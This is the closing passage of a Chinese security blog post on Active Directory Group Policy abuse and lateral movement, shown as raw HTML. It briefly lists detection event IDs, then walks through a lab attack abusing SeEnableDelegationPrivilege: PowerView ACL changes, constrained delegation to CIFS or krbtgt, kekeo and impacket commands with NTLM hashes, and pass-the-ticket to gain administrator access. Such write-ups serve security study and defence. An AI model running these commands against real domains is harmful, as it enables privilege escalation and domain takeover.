<span class="n">adfind</span> <span class="n">-b</span> <span class="n">OU</span><span class="p">=</span><span class="n">客服部</span><span class="p">,</span><span class="n">DC</span><span class="p">=</span><span class="n">0day</span><span class="p">,</span><span class="n">DC</span><span class="p">=</span><span class="n">org</span> <span class="n">-sddl</span><span class="p">+++</span> <span class="n">-s</span> <span class="n">base</span>  <span class="n">-sdna</span> <span class="n">-sddlfilter</span> <span class="p">;;;</span><span class="n">gPlink</span><span class="p">;;</span>
<span class="n">adfind</span> <span class="n">-b</span> <span class="n">OU</span><span class="p">=</span><span class="n">客服部</span><span class="p">,</span><span class="n">DC</span><span class="p">=</span><span class="n">0day</span><span class="p">,</span><span class="n">DC</span><span class="p">=</span><span class="n">org</span> <span class="n">-sddl</span><span class="p">+++</span> <span class="n">-s</span> <span class="n">base</span> <span class="n">-sdna</span> <span class="n">-sddlfilter</span> <span class="p">;;;</span><span class="n">gPOpptions</span><span class="p">;;</span>
</code></pre></td></tr></table></div>
</div>
</div></li>
</ol>
<p><strong>攻击检测</strong></p>
<p>事件ID5136，4662，5145可以看到GPO的ACL修改。</p>
<h3 id="seenabledelegationprivilege-特权"><a href="#seenabledelegationprivilege-特权" class="anchor-link">#</a><a href="#contents:seenabledelegationprivilege-特权" class="headings">SeEnableDelegationPrivilege 特权</a></h3>
<p>有SeEnableDelegationPrivilege权限的域用户才能给域内服务账户设置委派（约束和非约束，但不包括基于资源的约束委派）。该权限只能通过Default Domain Controllers Policy组策略修改（或修改域控的计算机策略）。</p>
<p>并不是拥有一个对象的GenericAll权限，就可以修改对象的msDS-AllowedToDelegateTo属性，只能有SeEnableDelegationPrivilege权限的才行。</p>
<ol>
<li>
<p><strong>赋予用户<code>SeEnableDelegationPrivilege</code>权限</strong></p>
<ul>
<li>
<p>通过组策略管理编辑器</p>
<p><img src="/images/image-1630807144.png" alt=""></p>
</li>
<li>
<p>通过Default Domain Controllers Policy下的GptTmpl.inf文件</p>
<p>文件位置:<code>\\rootkit.org\SYSVOL\rootkit.org\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf</code></p>
<p>添加jack用户的sid</p>
<p><img src="/images/image-1630807215.png" alt=""></p>
<p>再测试环境中，要使更改生效需要域控更新组策略:<code>gpupdate /force</code>，并使jack重新登录才有权限。（可能等待时间长些也能生效）</p>
</li>
</ul>
</li>
<li>
<p><strong>给服务账户设置委派</strong>（只有拥有SPN的用户才能被设置委派，机器账号默认注册了SPN）</p>
<ul>
<li>
<p>添加jack对PC-MICLE-KIT$的完全控制权限   <strong><a href="https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1" target="_blank" rel="noopener">PowerView</a></strong></p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#获取PC-MICLE-KIT的objectguid</span>
<span class="nb">Get-DomainComputer</span> <span class="nb">PC-MICLE</span><span class="n">-KIT</span>

<span class="c">#配置jack对PC-MICLE-KIT机器账号的所有权限，（必须配置，不然是无法修改账户属性的）</span>
<span class="nb">Add-DomainObjectAcl</span> <span class="n">-TargetIdentity</span> <span class="s1">&#39;b6283bcb-c141-4a53-99dd-a8d8a50a7b8d&#39;</span> <span class="n">-PrincipalIdentity</span> <span class="n">jack</span> <span class="n">-Rights</span> <span class="n">All</span> <span class="n">-Verbose</span>

<span class="c">#如果利用的是普通域用户的话，获得域用户控制权限后还需要为域用户设置spn，机器用户就跳过这步。</span>
<span class="n">setspn</span> <span class="n">-a</span> <span class="n">test</span><span class="p">/</span><span class="n">rootkit</span><span class="p">.</span><span class="n">org</span> <span class="n">test</span>

<span class="c">#验证权限，jack的sid</span>
<span class="nb">Get-DomainObjectAcl</span> <span class="n">-Identity</span> <span class="nb">PC-MICLE</span><span class="n">-KIT</span> <span class="p">|</span> <span class="p">?{</span><span class="nv">$_</span><span class="p">.</span><span class="n">SecurityIdentifier</span> <span class="o">-match</span> <span class="s2">&#34;S-1-5-21-3759881954-2993291187-3577547808-1135&#34;</span><span class="p">}</span>

<span class="c">#删除权限</span>
<span class="nb">Remove-DomainObjectAcl</span> <span class="n">-TargetIdentity</span> <span class="s2">&#34;b6283bcb-c141-4a53-99dd-a8d8a50a7b8d&#34;</span> <span class="n">-PrincipalIdentity</span> <span class="n">jack</span> <span class="n">-Rights</span> <span class="n">all</span> <span class="n">-Verbose</span>
</code></pre></td></tr></table></div>
</div>
</div></li>
<li>
<p>在jack会话中配置PC-MICLE-KIT到owa2013.rootkit.org的约束委派</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#方法一 PowerView</span>
<span class="c">#查看PC-MICLE-KIT机器账号的委派设置情况</span>
<span class="nb">Get-DomainObject</span> <span class="nb">PC-MICLE</span><span class="n">-KIT</span> <span class="n">-Properties</span> <span class="n">distinguishedname</span><span class="p">,</span><span class="n">useraccountcontrol</span><span class="p">,</span><span class="n">serviceprincipalname</span><span class="p">,</span><span class="nb">msds-allowedtodelegateto</span> <span class="p">|</span><span class="nb">fl
</span><span class="nb"></span><span class="c">#配置PC-MICLE-KIT到owa2013 CIFS服务的约束委派: 4096(WORKSTATION_TRUST_ACCOUNT)+16777216(TRUSTED_TO_AUTH_FOR_DELEGATION)=16781312</span>
<span class="nb">Set-DomainObject</span> <span class="nb">PC-MICLE</span><span class="n">-KIT</span> <span class="n">-Set</span> <span class="p">@{</span><span class="s1">&#39;msds-allowedtodelegateto&#39;</span><span class="p">=</span><span class="s1">&#39;CIFS/owa2013.rootkit.org&#39;</span><span class="p">;</span><span class="s1">&#39;useraccountcontrol&#39;</span><span class="p">=</span><span class="n">16781312</span><span class="p">}</span> <span class="n">-verbose</span>

<span class="c">#方法二 [Microsoft.ActiveDirectory.Management.dll](&lt;https://github.com/3gstudent/test/blob/master/Microsoft.ActiveDirectory.Management.dll&gt;)</span>
<span class="nb">Import-module</span> <span class="p">.\</span><span class="n">Microsoft</span><span class="p">.</span><span class="n">ActiveDirectory</span><span class="p">.</span><span class="n">Management</span><span class="p">.</span><span class="n">dll</span>
<span class="c">#用户的话使用$user = Get-ADUser test</span>
<span class="nv">$user</span> <span class="p">=</span> <span class="nb">Get-ADComputer</span> <span class="nb">PC-MICLE</span><span class="n">-KIT</span>
<span class="c">#配置PC-MICLE-KIT到krbtgt服务的约束委派（只能2008及其以前的KDC支持）</span>
<span class="nb">Set-ADObject</span> <span class="nv">$user</span> <span class="n">-Add</span> <span class="p">@{</span><span class="s2">&#34;msDS-AllowedToDelegateTo&#34;</span> <span class="p">=</span> <span class="p">@(</span><span class="s2">&#34;krbtgt/rootkit.org&#34;</span><span class="p">)}</span> <span class="o">-Replace</span> <span class="p">@{</span><span class="s2">&#34;useraccountcontrol&#34;</span><span class="p">=</span><span class="n">16781312</span><span class="p">}</span>
</code></pre></td></tr></table></div>
</div>
</div></li>
</ul>
</li>
<li>
<p><strong>用<code>PC-MICLE-KIT$</code>账号发起s4u2self和s4u2proxy请求</strong></p>
<ul>
<li>
<p>如果配置到<code>CIFS/owa2013.rootkit.org</code>服务的约束委派，那么模拟administrator访问owa2013.rootkit.org CIFS服务</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#keko</span>
<span class="c">#生成TGT票据</span>
<span class="n">tgt</span><span class="p">::</span><span class="n">ask</span> <span class="p">/</span><span class="n">user</span><span class="err">:</span><span class="nb">PC-MICLE</span><span class="n">-KIT</span><span class="p">$</span> <span class="p">/</span><span class="n">domain</span><span class="err">:</span><span class="n">rootkit</span><span class="p">.</span><span class="n">org</span> <span class="p">/</span><span class="n">ntlm</span><span class="err">:</span><span class="n">a15bc42b9f1f1daa812a0b75a4c775c4</span>
<span class="c">#发起s4u请求</span>
<span class="n">tgs</span><span class="p">::</span><span class="n">s4u</span> <span class="p">/</span><span class="n">tgt</span><span class="err">:</span><span class="nb">TGT_PC-MICLE</span><span class="n">-KIT</span><span class="p">$</span><span class="nv">@ROOTKIT</span><span class="p">.</span><span class="n">ORG_krbtgt</span><span class="p">~</span><span class="n">rootkit</span><span class="p">.</span><span class="n">org</span><span class="nv">@ROOTKIT</span><span class="p">.</span><span class="n">ORG</span><span class="p">.</span><span class="n">kirbi</span> <span class="p">/</span><span class="n">user</span><span class="err">:</span><span class="n">administrator</span><span class="nv">@rootkit</span><span class="p">.</span><span class="n">org</span> <span class="p">/</span><span class="n">service</span><span class="err">:</span><span class="n">CIFS</span><span class="p">/</span><span class="n">owa2013</span><span class="p">.</span><span class="n">rootkit</span><span class="p">.</span><span class="n">org</span>
<span class="c">#ptt</span>
<span class="n">kerberos</span><span class="p">::</span><span class="n">ptt</span> <span class="n">TGS_administrator</span><span class="nv">@rootkit</span><span class="p">.</span><span class="n">org</span><span class="nv">@ROOTKIT</span><span class="p">.</span><span class="n">ORG_CIFS</span><span class="p">~</span><span class="n">owa2013</span><span class="p">.</span><span class="n">rootkit</span><span class="p">.</span><span class="n">org</span><span class="nv">@ROOTKIT</span><span class="p">.</span><span class="n">ORG</span><span class="p">.</span><span class="n">kirbi</span>
<span class="nb">dir </span><span class="p">\\</span><span class="n">owa2013</span><span class="p">.</span><span class="n">rootkit</span><span class="p">.</span><span class="n">org</span><span class="p">\</span><span class="n">c</span><span class="p">$</span>
</code></pre></td></tr></table></div>
</div>
</div></li>
<li>
<p>如果配置到krbtgt（即TGS服务）的约束委派</p>
<p><strong>Tips:</strong> 黄金票据是通过用<code>krbtgt</code>的hash来伪造TGT。而创建到krbtgt用户的约束委派也能达到同样的效果。TGS服务器默认的SPN是<code>krbtgt/domain name</code>。（只适用于2008及之前的KDC，2012的域控上未成功，2012及以后的KDC，受限委派的时候用的机制变成了基于资源的委派，已测试）</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="n">python3</span> <span class="n">getST</span><span class="o">.</span><span class="n">py</span> <span class="o">-</span><span class="n">dc</span><span class="o">-</span><span class="n">ip</span> <span class="mf">192.168.1.10</span> <span class="o">-</span><span class="n">spn</span> <span class="n">krbtgt</span><span class="o">/</span><span class="mi">0</span><span class="n">day</span><span class="o">.</span><span class="n">org</span> <span class="o">-</span><span class="n">impersonate</span> <span class="n">administrator</span> <span class="mi">0</span><span class="n">day</span><span class="o">.</span><span class="n">org</span><span class="o">/</span><span class="n">PC</span><span class="o">-</span><span class="n">JACK</span><span class="o">-</span><span class="mi">0</span><span class="n">DAY</span><span class="err">$</span> <span class="o">-</span><span class="n">hashes</span> <span class="p">:</span><span class="mi">35</span><span class="n">c7a1ec7ab4df8d073abe65e5375f3a</span>
<span class="c1">#这里的krbtgt的TGS票据，相当于TGT票据</span>
<span class="n">export</span> <span class="n">KRB5CCNAME</span><span class="o">=</span><span class="n">administrator</span><span class="o">.</span><span class="n">ccache</span>
<span class="n">python3</span> <span class="n">wmiexec</span><span class="o">.</span><span class="n">py</span> <span class="mi">0</span><span class="n">day</span><span class="o">.</span><span class="n">org</span><span class="o">/</span><span class="n">administrator</span><span class="nd">@OWA2010SP3</span><span class="mf">.0</span><span class="n">day</span><span class="o">.</span><span class="n">org</span> <span class="o">-</span><span class="n">no</span><span class="o">-</span><span class="k">pass</span> <span class="o">-</span><span class="n">k</span> 
</code></pre></td></tr></table></div>
</div>
</div></li>
</ul>
</li>
</ol>
<h2 id="参考"><a href="#参考" class="anchor-link">#</a><a href="#contents:参考" class="headings">参考</a></h2>
<ol>
<li><a href="https://www.anquanke.com/post/id/203151" target="_blank" rel="noopener">Windows内网协议学习LDAP篇之组策略</a></li>
</ol>

            </div>

            
    
    
        <ul class="post-copyright">
            <li class="copyright-item author"><span class="copyright-item-text">作者</span>：<a href="https://myzxcg.com/" class="p-author h-card" target="_blank" rel="noopener">myzxcg</a></li>
            
                
                
                
                
                <li class="copyright-item link"><span class="copyright-item-text">链接</span>：<a href="/2021/09/%E7%BB%84%E7%AD%96%E7%95%A5%E5%88%A9%E7%94%A8%E4%B8%8E%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" target="_blank" rel="noopener">https://myzxcg.com/2021/09/组策略利用与横向移动/</a></li>
            
            <li class="copyright-item license"><span class="copyright-item-text">许可</span>：<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a></li>
            
        </ul>
    



        </article>

        

        


        


        


        
    
    
        <div class="related-posts">
            <h2 class="related-title">相关文章：<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon related-icon"><path d="M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm144 276c0 6.6-5.4 12-12 12h-92v92c0 6.6-5.4 12-12 12h-56c-6.6 0-12-5.4-12-12v-92h-92c-6.6 0-12-5.4-12-12v-56c0-6.6 5.4-12 12-12h92v-92c0-6.6 5.4-12 12-12h56c6.6 0 12 5.4 12 12v92h92c6.6 0 12 5.4 12 12v56z"/></svg></h2>
            <ul class="related-list">
                
                    <li class="related-item">
                        <a href="/2021/10/%E5%9F%9F%E5%A7%94%E6%B4%BE%E5%88%A9%E7%94%A8/" class="related-link">域委派利用</a>
                    </li>
                
                    <li class="related-item">
                        <a href="/2021/09/%E5%9F%9F%E7%94%A8%E6%88%B7%E5%8F%A3%E4%BB%A4%E7%AD%96%E7%95%A5%E4%B8%8E%E6%9A%B4%E7%A0%B4/" class="related-link">域用户口令策略与暴破</a>
                    </li>
                
                    <li class="related-item">
                        <a href="/2021/08/%E5%9F%9F%E7%94%A8%E6%88%B7%E4%B8%8E%E5%9F%9F%E6%88%90%E5%91%98%E6%9C%BA%E5%99%A8%E5%85%B3%E7%B3%BB%E5%8F%8A%E5%88%A9%E7%94%A8/" class="related-link">域用户与域成员机器关系及利用</a>
                    </li>
                
                    <li class="related-item">
                        <a href="/2021/08/Windows%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B-ACL%E5%88%86%E6%9E%90/" class="related-link">Windows访问控制模型--ACL分析</a>
                    </li>
                
                    <li class="related-item">
                        <a href="/2021/11/%E5%88%A9%E7%94%A8.NET-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%81%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" class="related-link">利用.NET 反序列化做权限维持</a>
                    </li>
                
            </ul>
        </div>
    



        


        
    <footer class="minimal-footer">
        
            <div class="post-tag"><a href="/tags/Windows/" rel="tag" class="post-tag-link">#windows</a> <a href="/tags/%E5%9F%9F%E7%9B%B8%E5%85%B3/" rel="tag" class="post-tag-link">#域相关</a></div>
        
        
        
            
        
    </footer>



        


        
    
        
        
    
    
    
    
        <ul class="post-nav">
            
                <li class="post-nav-prev">
                    <a href="/2021/09/%E5%9F%9F%E7%94%A8%E6%88%B7%E5%8F%A3%E4%BB%A4%E7%AD%96%E7%95%A5%E4%B8%8E%E6%9A%B4%E7%A0%B4/" rel="prev">&lt; 域用户口令策略与暴破</a>
                </li>
            
            
                <li class="post-nav-next">
                    <a href="/2021/08/%E5%9F%9F%E7%94%A8%E6%88%B7%E4%B8%8E%E5%9F%9F%E6%88%90%E5%91%98%E6%9C%BA%E5%99%A8%E5%85%B3%E7%B3%BB%E5%8F%8A%E5%88%A9%E7%94%A8/" rel="next">域用户与域成员机器关系及利用 &gt;</a>
                </li>
            
        </ul>
    



        
    

        
            <div class="load-comments">
                <div id="load-comments">加载评论</div>
            </div>
        

        

        
            <div id="vcomments"></div>
        

        

        
    



    </div>
</main>


            
    <div id="back-to-top" class="back-to-top">
        <a href="#"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" class="icon arrow-up"><path d="M34.9 289.5l-22.2-22.2c-9.4-9.4-9.4-24.6 0-33.9L207 39c9.4-9.4 24.6-9.4 33.9 0l194.3 194.3c9.4 9.4 9.4 24.6 0 33.9L413 289.4c-9.5 9.5-25 9.3-34.3-.4L264 168.6V456c0 13.3-10.7 24-24 24h-32c-13.3 0-24-10.7-24-24V168.6L69.2 289.1c-9.3 9.8-24.8 10-34.3.4z"/></svg></a>
    </div>


            
    <footer id="footer" class="footer">
        <div class="footer-inner">
            

            
    
        <ul class="socials"><li class="socials-item">
                    <a href="https://github.com/myzxcg" target="_blank" rel="external noopener" title="GitHub"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" class="icon social-icon"><path d="M12 .297c-6.63 0-12 5.373-12 12 0 5.303 3.438 9.8 8.205 11.385.6.113.82-.258.82-.577 0-.285-.01-1.04-.015-2.04-3.338.724-4.042-1.61-4.042-1.61C4.422 18.07 3.633 17.7 3.633 17.7c-1.087-.744.084-.729.084-.729 1.205.084 1.838 1.236 1.838 1.236 1.07 1.835 2.809 1.305 3.495.998.108-.776.417-1.305.76-1.605-2.665-.3-5.466-1.332-5.466-5.93 0-1.31.465-2.38 1.235-3.22-.135-.303-.54-1.523.105-3.176 0 0 1.005-.322 3.3 1.23.96-.267 1.98-.399 3-.405 1.02.006 2.04.138 3 .405 2.28-1.552 3.285-1.23 3.285-1.23.645 1.653.24 2.873.12 3.176.765.84 1.23 1.91 1.23 3.22 0 4.61-2.805 5.625-5.475 5.92.42.36.81 1.096.81 2.22 0 1.606-.015 2.896-.015 3.286 0 .315.21.69.825.57C20.565 22.092 24 17.592 24 12.297c0-6.627-5.373-12-12-12"/></svg></a>
                </li><li class="socials-item">
                    <a href="https://twitter.com/myzxcg" target="_blank" rel="external noopener" title="Twitter"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon social-icon"><path d="M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z"/></svg></a>
                </li><li class="socials-item">
                    <a href="mailto:myz.xcg@gmail.com" target="_blank" rel="external noopener" title="Email"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon social-icon"><path d="M464 64H48C21.49 64 0 85.49 0 112v288c0 26.51 21.49 48 48 48h416c26.51 0 48-21.49 48-48V112c0-26.51-21.49-48-48-48zm0 48v40.805c-22.422 18.259-58.168 46.651-134.587 106.49-16.841 13.247-50.201 45.072-73.413 44.701-23.208.375-56.579-31.459-73.413-44.701C106.18 199.465 70.425 171.067 48 152.805V112h416zM48 400V214.398c22.914 18.251 55.409 43.862 104.938 82.646 21.857 17.205 60.134 55.186 103.062 54.955 42.717.231 80.509-37.199 103.053-54.947 49.528-38.783 82.032-64.401 104.947-82.653V400H48z"/></svg></a>
                </li><li class="socials-item">
                    <a href="/rss.xml" target="_blank" rel="external noopener" title="RSS"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" class="icon social-icon"><path d="M19.199 24C19.199 13.467 10.533 4.8 0 4.8V0c13.165 0 24 10.835 24 24h-4.801zM3.291 17.415c1.814 0 3.293 1.479 3.293 3.295 0 1.813-1.485 3.29-3.301 3.29C1.47 24 0 22.526 0 20.71s1.475-3.294 3.291-3.295zM15.909 24h-4.665c0-6.169-5.075-11.245-11.244-11.245V8.09c8.727 0 15.909 7.184 15.909 15.91z"/></svg></a>
                </li></ul>
    


            <div class="site-info">©&nbsp;2021&nbsp;myzxcg&nbsp;| Powered by <a href="https://github.com/reuixiy/hugo-theme-meme" target="_blank" rel="noopener">MemE</a>
              </div>

            
        </div>
    </footer>


        </div>
        

        






    

        

        
            <script>
    function loadComments() {
        if (typeof Valine === 'undefined') {
            var getScript = (options) => {
                var script = document.createElement('script');
                script.defer = true;
                script.crossOrigin = 'anonymous';
                Object.keys(options).forEach((key) => {
                    script[key] = options[key];
                });
                document.body.appendChild(script);
            };
            getScript({
                src: '//unpkg.com/valine@latest/dist/Valine.min.js',
                onload: () => {
                    newValine();
                }
            });
        } else {
            newValine();
        }
    }
    function newValine() {
        new Valine({
            el: '#vcomments',
            appId: '6Fu9AJHglaqmAVjpYMdOOBEi-MdYXbMMI',
            appKey: '0GcKEskKSnNfqn5dbNITfO4H',
            placeholder: '有问题欢迎交流',
            path: location.pathname,
            avatar: 'mp',
            meta: ["nick","mail","link"],
            pageSize:  10 ,
            lang: 'zh-cn',
            visitor:  false ,
            highlight:  true ,
            avatarForce:  false ,
            recordIP:  true ,
            serverURLs: '',
            emojiCDN: '',
            emojiMaps: {},
            enableQQ:  false ,
            requiredFields: []
        });
    }
</script>

        

        

        

    



    <script src="https://cdn.jsdelivr.net/npm/medium-zoom@latest/dist/medium-zoom.min.js"></script>

<script>
    let imgNodes = document.querySelectorAll('div.post-body img');
    imgNodes = Array.from(imgNodes).filter(node => node.parentNode.tagName !== "A");

    mediumZoom(imgNodes, {
        background: 'hsla(var(--color-bg-h), var(--color-bg-s), var(--color-bg-l), 0.95)'
    })
</script>




    <script src="https://cdn.jsdelivr.net/npm/instant.page@5.1.0/instantpage.min.js" type="module" defer></script>







    </body>
</html>
